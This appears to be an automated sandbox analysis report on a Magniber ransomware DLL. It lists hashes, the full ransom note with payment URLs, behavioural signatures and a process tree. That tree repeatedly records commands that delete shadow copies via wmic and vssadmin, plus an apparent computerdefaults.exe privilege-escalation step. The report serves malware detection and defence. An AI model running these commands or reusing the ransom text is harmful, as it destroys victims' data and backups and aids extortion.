Analysis

  • max time kernel
    146s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-08-2024 08:37

General

  • Target

    be3c7d928663380e88f3fb97bb17b2da_JaffaCakes118.dll

  • Size

    20KB

  • MD5

    be3c7d928663380e88f3fb97bb17b2da

  • SHA1

    ebaed1467dc8f6b80c5f8bf0a596525979ea2825

  • SHA256

    c070f4e29d6d33432b484bfba03b6d66eda0befda54600cb6d4fda4de27a44df

  • SHA512

    6d7a286fa2c18fd0fc364d3a8b05538dec250887fb965cd3ce28747e8cfe2334ff8b88ddc03532e83ee804c5ac77a502b080a63a0f1b2a4468cb18b323b90017

  • SSDEEP

    384:dLck6pO6NPXcNSHHNGopa6RmR2VZNtEK8H7TqeuB5xtfRlhrrYkQMeg75lb:Fv67u4HHEV6RmgNtEKReuB5xtffhrrY6

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://3648941812106ee00ezmmmgwfp.zokkkgngjqrnmiv3gbm3xcflq2bfgoji7uvyrig6ds2ufrv45jcenzyd.onion/zmmmgwfp Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://3648941812106ee00ezmmmgwfp.sonwear.quest/zmmmgwfp http://3648941812106ee00ezmmmgwfp.fewacts.space/zmmmgwfp http://3648941812106ee00ezmmmgwfp.refersa.casa/zmmmgwfp http://3648941812106ee00ezmmmgwfp.asmoral.site/zmmmgwfp Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://3648941812106ee00ezmmmgwfp.zokkkgngjqrnmiv3gbm3xcflq2bfgoji7uvyrig6ds2ufrv45jcenzyd.onion/zmmmgwfp

http://3648941812106ee00ezmmmgwfp.sonwear.quest/zmmmgwfp

http://3648941812106ee00ezmmmgwfp.fewacts.space/zmmmgwfp

http://3648941812106ee00ezmmmgwfp.refersa.casa/zmmmgwfp

http://3648941812106ee00ezmmmgwfp.asmoral.site/zmmmgwfp

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 50 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (98) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Suspicious use of SetThreadContext 14 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 30 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 54 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of UnmapMainImage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    PID:2636
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
        PID:5700
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        2⤵
          PID:5736
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            3⤵
              PID:5592
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
            2⤵
              PID:5580
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                3⤵
                  PID:5556
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
              1⤵
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:2648
              • C:\Windows\system32\notepad.exe
                notepad.exe C:\Users\Public\readme.txt
                2⤵
                • Opens file in notepad (likely ransom note)
                PID:1240
              • C:\Windows\system32\cmd.exe
                cmd /c "start http://3648941812106ee00ezmmmgwfp.sonwear.quest/zmmmgwfp^&2^&30586637^&98^&381^&2219041"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3976
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://3648941812106ee00ezmmmgwfp.sonwear.quest/zmmmgwfp&2&30586637&98&381&2219041
                  3⤵
                  • Enumerates system info in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:3656
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff9c2346f8,0x7fff9c234708,0x7fff9c234718
                    4⤵
                      PID:1768
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
                      4⤵
                        PID:4180
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:64
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
                        4⤵
                          PID:4340
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                          4⤵
                            PID:4944
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
                            4⤵
                              PID:2228
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
                              4⤵
                                PID:5208
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
                                4⤵
                                  PID:5608
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
                                  4⤵
                                    PID:5996
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
                                    4⤵
                                      PID:6004
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
                                      4⤵
                                        PID:5244
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:5636
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
                                        4⤵
                                          PID:2168
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
                                          4⤵
                                            PID:4816
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
                                            4⤵
                                              PID:4212
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
                                              4⤵
                                                PID:5848
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,10445512257439644040,15462985218857927334,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5736 /prefetch:2
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5208
                                          • C:\Windows\system32\wbem\wmic.exe
                                            C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                            2⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5056
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1460
                                            • C:\Windows\system32\wbem\WMIC.exe
                                              C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1596
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:4012
                                            • C:\Windows\system32\wbem\WMIC.exe
                                              C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                              3⤵
                                                PID:1108
                                          • C:\Windows\system32\taskhostw.exe
                                            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                            1⤵
                                            • Modifies registry class
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            PID:2748
                                            • C:\Windows\system32\wbem\wmic.exe
                                              C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                              2⤵
                                                PID:5700
                                              • C:\Windows\system32\cmd.exe
                                                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                2⤵
                                                  PID:5940
                                                  • C:\Windows\system32\wbem\WMIC.exe
                                                    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                    3⤵
                                                      PID:5944
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                    2⤵
                                                      PID:5888
                                                      • C:\Windows\system32\wbem\WMIC.exe
                                                        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                        3⤵
                                                          PID:5976
                                                    • C:\Windows\Explorer.EXE
                                                      C:\Windows\Explorer.EXE
                                                      1⤵
                                                      • Modifies Internet Explorer settings
                                                      • Modifies registry class
                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of UnmapMainImage
                                                      PID:3400
                                                      • C:\Windows\system32\rundll32.exe
                                                        rundll32.exe C:\Users\Admin\AppData\Local\Temp\be3c7d928663380e88f3fb97bb17b2da_JaffaCakes118.dll,#1
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:4060
                                                        • C:\Windows\system32\wbem\wmic.exe
                                                          C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                          3⤵
                                                            PID:5584
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                            3⤵
                                                              PID:5928
                                                              • C:\Windows\system32\wbem\WMIC.exe
                                                                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                4⤵
                                                                  PID:4948
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                3⤵
                                                                  PID:3976
                                                                  • C:\Windows\system32\wbem\WMIC.exe
                                                                    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                    4⤵
                                                                      PID:5696
                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                  2⤵
                                                                    PID:5872
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                    2⤵
                                                                      PID:756
                                                                      • C:\Windows\system32\wbem\WMIC.exe
                                                                        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                        3⤵
                                                                          PID:5812
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                        2⤵
                                                                          PID:4312
                                                                          • C:\Windows\system32\wbem\WMIC.exe
                                                                            C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                            3⤵
                                                                              PID:4552
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                          1⤵
                                                                          • Modifies registry class
                                                                          PID:3640
                                                                          • C:\Windows\system32\wbem\wmic.exe
                                                                            C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                            2⤵
                                                                              PID:5900
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                              2⤵
                                                                                PID:5804
                                                                                • C:\Windows\system32\wbem\WMIC.exe
                                                                                  C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                  3⤵
                                                                                    PID:3284
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                  2⤵
                                                                                    PID:6044
                                                                                    • C:\Windows\system32\wbem\WMIC.exe
                                                                                      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                      3⤵
                                                                                        PID:5252
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:3804
                                                                                    • C:\Windows\system32\wbem\wmic.exe
                                                                                      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                      2⤵
                                                                                        PID:5060
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                        2⤵
                                                                                          PID:5848
                                                                                          • C:\Windows\system32\wbem\WMIC.exe
                                                                                            C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                            3⤵
                                                                                              PID:5252
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                            2⤵
                                                                                              PID:2576
                                                                                              • C:\Windows\system32\wbem\WMIC.exe
                                                                                                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                                3⤵
                                                                                                  PID:6076
                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of UnmapMainImage
                                                                                              PID:3896
                                                                                              • C:\Windows\system32\wbem\wmic.exe
                                                                                                C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                2⤵
                                                                                                  PID:5092
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                  2⤵
                                                                                                    PID:5252
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                    2⤵
                                                                                                      PID:5224
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:3960
                                                                                                    • C:\Windows\system32\wbem\wmic.exe
                                                                                                      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                      2⤵
                                                                                                        PID:5732
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                        2⤵
                                                                                                          PID:5748
                                                                                                          • C:\Windows\system32\wbem\WMIC.exe
                                                                                                            C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                                            3⤵
                                                                                                              PID:6008
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                            2⤵
                                                                                                              PID:5700
                                                                                                              • C:\Windows\system32\wbem\WMIC.exe
                                                                                                                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                                                3⤵
                                                                                                                  PID:6124
                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                              1⤵
                                                                                                                PID:4040
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of UnmapMainImage
                                                                                                                PID:3472
                                                                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                                                                  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                  2⤵
                                                                                                                    PID:5516
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                                    2⤵
                                                                                                                      PID:5528
                                                                                                                      • C:\Windows\system32\wbem\WMIC.exe
                                                                                                                        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                                                        3⤵
                                                                                                                          PID:5680
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                                        2⤵
                                                                                                                          PID:5536
                                                                                                                          • C:\Windows\system32\wbem\WMIC.exe
                                                                                                                            C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                                                            3⤵
                                                                                                                              PID:5688
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                                          PID:1920
                                                                                                                          • C:\Windows\system32\wbem\wmic.exe
                                                                                                                            C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                            2⤵
                                                                                                                              PID:5892
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                                              2⤵
                                                                                                                                PID:5324
                                                                                                                                • C:\Windows\system32\wbem\WMIC.exe
                                                                                                                                  C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                                                                  3⤵
                                                                                                                                    PID:6064
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                                                  2⤵
                                                                                                                                    PID:6036
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      3⤵
                                                                                                                                        PID:5804
                                                                                                                                      • C:\Windows\system32\wbem\WMIC.exe
                                                                                                                                        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                                                                                                                        3⤵
                                                                                                                                          PID:4528
                                                                                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
                                                                                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:1976
                                                                                                                                      • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                        C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                        2⤵
                                                                                                                                          PID:5692
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                                                          2⤵
                                                                                                                                            PID:5176
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                                                                                                                                            2⤵
                                                                                                                                              PID:5352
                                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
                                                                                                                                            1⤵
                                                                                                                                              PID:4668
                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                              1⤵
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:4208
                                                                                                                                            • C:\Windows\system32\vssadmin.exe
